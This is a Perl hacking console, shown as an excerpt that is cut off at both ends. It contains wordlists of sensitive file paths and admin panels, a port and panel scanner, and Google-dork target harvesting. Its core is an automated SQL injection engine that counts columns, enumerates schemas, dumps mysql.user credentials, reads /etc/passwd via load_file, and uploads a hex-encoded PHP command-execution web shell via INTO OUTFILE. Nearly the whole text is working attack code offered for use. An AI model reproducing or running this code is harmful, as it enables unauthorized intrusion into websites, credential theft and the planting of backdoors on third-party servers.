p.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');


unless (-d "/logs/webs") {
mkdir("logs/",777);
mkdir("logs/webs/",777);
}

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

getinfo();

$SIG{INT} = \&next;

while(1) {
cprint "\x037"; #13
menujo();
cprint "\x030";
}

sub getinfo {
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();
cprint "\x0313"; #13
print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
cprint "\x030";
}


sub menujo {
print "\n\n>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/getinfo/ig) {
getinfo();
}
if ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] sintax : getip <host>\n";
}
print "\n[IP] : ".getip($1)."\n";
print "\n";
}

elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n";
$code = toma($1);
my @re = get_links($code);
for my $url(@re) {
print "[Link] : $url\n";
}
print "\n\n[+] Finish\n";
}

elsif ($cmd=~/help/) {
helpme();
}

elsif ($cmd=~/getprocess/) {
my %re = getprocess();


for my $data(keys %re) {
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n";
print "[+] PID : ".$re{$data}."\n\n";
}
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed";
}
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar($1,$2,$3);
}
elsif ($cmd=~/allow (.*)/) {
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n";
}}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en($1)."\n\n";
}
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de($1)."\n\n";
}
elsif ($cmd=~/download (.*) (.*)/) {
my $file,$name = $1,$2;
if (download($1,$2)) {
print "[+] File downloaded\n";
}
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii($1)."\n\n";
}
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de($1)."\n\n";
}
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base($1)."\n\n";
}
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de($1)."\n\n";
}
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
elsif ($cmd=~/scangoogle/) {
print "[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
}
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
elsif ($cmd=~/navegator/) {
nave:
print getcwd().">";
chomp(my $rta = <stdin>);
print "\n\n";
if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n";
} else {
print "[Directory] : ".$_."\n";
}}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
if (chdir($dir)) {
print "\n[+] Directory changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
if (unlink($file)) {
print "\n[+] File Deleted\n";
} else {
print "\n[-] Error\n";
}
} else {
if (rmdir($file)) {
print "\n[+] Directory Deleted\n";
} else {
print "\n[-] Error\n";
}}}
if ($rta=~/rename (.*) (.*)/) {
if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
print "\n[+] File Changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/open (.*)/) {
my $file = $1;
chomp $file;
system($file);
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n";
}
if ($rta=~/exit/) {
next;
}
print "\n\n";
goto nave;
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
chomp $url;
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
elsif ($cmd=~/exit/) {
copyright();
<stdin>;
exit(1);
}
else {
system($cmd);
}
#print "\n\n";
}


sub scansqli {

my $page = $_[0];
print "[Status] : Scanning.....\n";
($pass1,$bypass2) = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;

if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
} else {

my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);

unless ($testar1 eq $testar2) {
motor($page,$_[1]);
} else {
print "\n[-] Not vulnerable\n\n";
print "[+] Scan anyway y/n : ";
chomp(my $op = <stdin>);
if ($op eq "y") {
motor($page,$_[1]);
} else {
#head();
#menu();
}}}}

sub motor {

my ($gen,$save,$control) = &length($_[0],$_[1]);

if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print "[Status] : Length columns not found\n\n";
}
}

sub length {
print "\n[+] Looking for the number of columns\n\n";
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);

$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}

sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n[+] Searching information..\n\n"; 
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[load_file] : ON\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; 
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}


sub menu_options {

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>";
chomp (my $rta = <stdin>);

if ($rta=~/help/) {
print qq(

commands : details tables columns dbs othertable othercolumn
           mysqluser dumper createshell readfile logs exit 

);
}


if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;	
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($rta=~/exit/) {
next;
}

elsif($rta=~/createshell/) {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
}
elsif($rta=~/readfile/) {
loadfile($_[0],$_[1],$save);
}
elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}



sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
my $resto = $1;
$total = $resto - 17; 
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}	 
}

sub reload {
&menu_options($_[0]);
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n"; 
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
print "\n";
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
print "\n";	
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
print "\n";
}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) { 
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
print "\n";
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n";
}
}

sub dump {
savefile($_[5].".txt","\n");
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){ 
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1; 
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) { 
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n"; 
} else {
print "\n\n[+] Extracting Finish\n\n"; 
last;
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}


sub loadfile {
savefile($_[2].".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] File to read : ";
chomp (my $file = <stdin>);
$concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
my $code = toma($start.$concat.$end.$pass2);
chomp $code;
if ($code=~/k0bra(.*)k0bra/s) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}
&reload;
}


sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 	
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
print "\n\n";
&reload;
}


sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0]; 
}

sub base {
$re = encode_base64($_[0]);
chomp $re;
return $re;
}

sub base_de {
$re = decode_base64($_[0]);
chomp $re;
return $re;
}


sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
